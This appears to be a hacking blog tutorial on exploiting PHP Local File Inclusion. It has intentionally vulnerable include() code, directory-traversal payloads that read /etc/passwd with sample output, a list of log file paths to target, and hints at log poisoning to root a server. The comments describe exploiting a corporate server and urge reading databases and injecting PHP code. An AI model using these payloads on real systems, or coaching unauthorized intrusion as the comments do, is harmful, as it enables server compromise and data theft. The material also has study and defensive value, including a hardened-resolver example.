Exploiting Local File Inclusion vulnerability (LFI)

The site has moved to the root domain, where all posts are imported. Please go to http://pusheax.com/

Local File Inclusion means loading a local file, such as /etc/passwd or /etc/hosts, through a PHP web page. Many programming mistakes can cause this vulnerability. It occurs when a programmer passes untrusted input into one of these PHP functions:

include
include_once
require
require_once
fopen

For example, suppose a page contains:

<?php
// Deliberately vulnerable: the GET parameter is passed straight to include()
$vulnerable = $_GET['vulnerable'];
include($vulnerable); # this may also be require, require_once, fopen, etc.
?>

This code is vulnerable to Local File Inclusion.

Suppose our target URL is www.n00bprogammer.com/vulnerable/

If you submit this URL directly in the browser address bar you get a web page, which means there is a file "index.php" in that directory.

If we try something like:

www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../etc/passwd (did not work)

www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../../../etc/passwd

And it outputs:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:103:108::/var/lib/landscape:/bin/false
messagebus:x:104:112::/var/run/dbus:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:105:113::/var/lib/mysql:/bin/false
avahi:x:106:114::/var/run/avahi-daemon:/bin/false
snort:x:107:115:Snort IDS:/var/log/snort:/bin/false
statd:x:108:65534::/var/lib/nfs:/bin/false
haldaemon:x:109:117::/var/run/hald:/bin/false
kdm:x:110:65534::/home/kdm:/bin/false

That means it worked. But modern Unix-like systems no longer store password hashes in /etc/passwd (all hashes are in /etc/shadow), and since the web server has no permission to read /etc/shadow, you can't read that file this way.
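To make the example above concrete, here is an added illustration (not code from the original post) that mimics what the vulnerable include() resolves a parameter to, why two "../" were not enough while four were, and what a hardened resolver does with the same input. The document root is an assumption; it is chosen four levels below / to match the post.

```python
import posixpath
from urllib.parse import unquote

# Assumed layout (not from the original post): index.php lives here, four levels
# below /, which is why the post needed four "../" to reach /etc/passwd.
WEB_ROOT = "/var/www/html/vulnerable"
# Constructed allowlist of pages the hardened version is permitted to include.
ALLOWED_PAGES = {"home.php", "about.php"}


def resolve_include(param, base=WEB_ROOT):
    """Approximate what include($_GET['vulnerable']) resolves a relative path to:
    the raw parameter is joined onto the script's directory with no checks at all."""
    return posixpath.normpath(posixpath.join(base, unquote(param)))


def safe_include(param, base=WEB_ROOT, allowed=ALLOWED_PAGES):
    """Hardened resolver: decode first so the check sees what PHP sees, accept only a
    bare name from the allowlist, and confirm the result still lies inside the web
    root. Returns the resolved path, or None when the request is rejected."""
    param = unquote(param)
    if param not in allowed:  # rejects "../", absolute paths and unknown names outright
        return None
    target = posixpath.normpath(posixpath.join(base, param))
    if posixpath.commonpath([base, target]) != base:  # defence in depth: containment check
        return None
    return target


def explain(param):
    """Show the attacker-controlled parameter beside what each resolver does with it."""
    return {"param": param,
            "vulnerable": resolve_include(param),
            "hardened": safe_include(param)}


if __name__ == "__main__":
    for p in ["home.php", "../../etc/passwd", "../../../../etc/passwd"]:
        print(explain(p))
```

The second payload lands on /var/www/etc/passwd, which does not exist, which is why the post's first attempt "did not work"; the hardened resolver rejects both traversal payloads and accepts only allowlisted page names.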

There are other files you may be interested in reading:

/etc/httpd/logs/access_log
/etc/httpd/logs/error_log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log

Many sites have an unnecessary URL parameter whose value is a file name with an extension, such as a php, image or asp file. This is not secure at all. For example:

www.target.site/vulnerable.php?=image.jpeg

This may also be vulnerable to LFI. Try it.

Advanced attackers can go deeper, for example:

1. There are special ways of attacking the application tier to root the system (hint: overwriting error_log).
2. Reading more sensitive files (hint: SQL).

Try them, research and learn...

Read more: http://en.wikipedia.org/wiki/Remote_file_inclusion 

Let me know if you have any questions.


4 Replies to "Exploiting Local File Inclusion vulnerability (LFI)"

  1. Got a bug today on a corporate's server. Its code is using a PHP download stream "as it is" no matter what the file.. LOL. Using LFI, tried to reach /etc/passwd, luckily got the whole user list in it. But as mentioned above, do you have any idea or maybe some exploits on how to read the shadow file?

  2. You should not mention anywhere where you got the bug, otherwise you may fall into problems (be ethical LOL). Anyway, you should always look for other sensitive information like databases, source code etc., or even try to inject some PHP code using the vulnerability.

    There are many tutorials about that, I think.
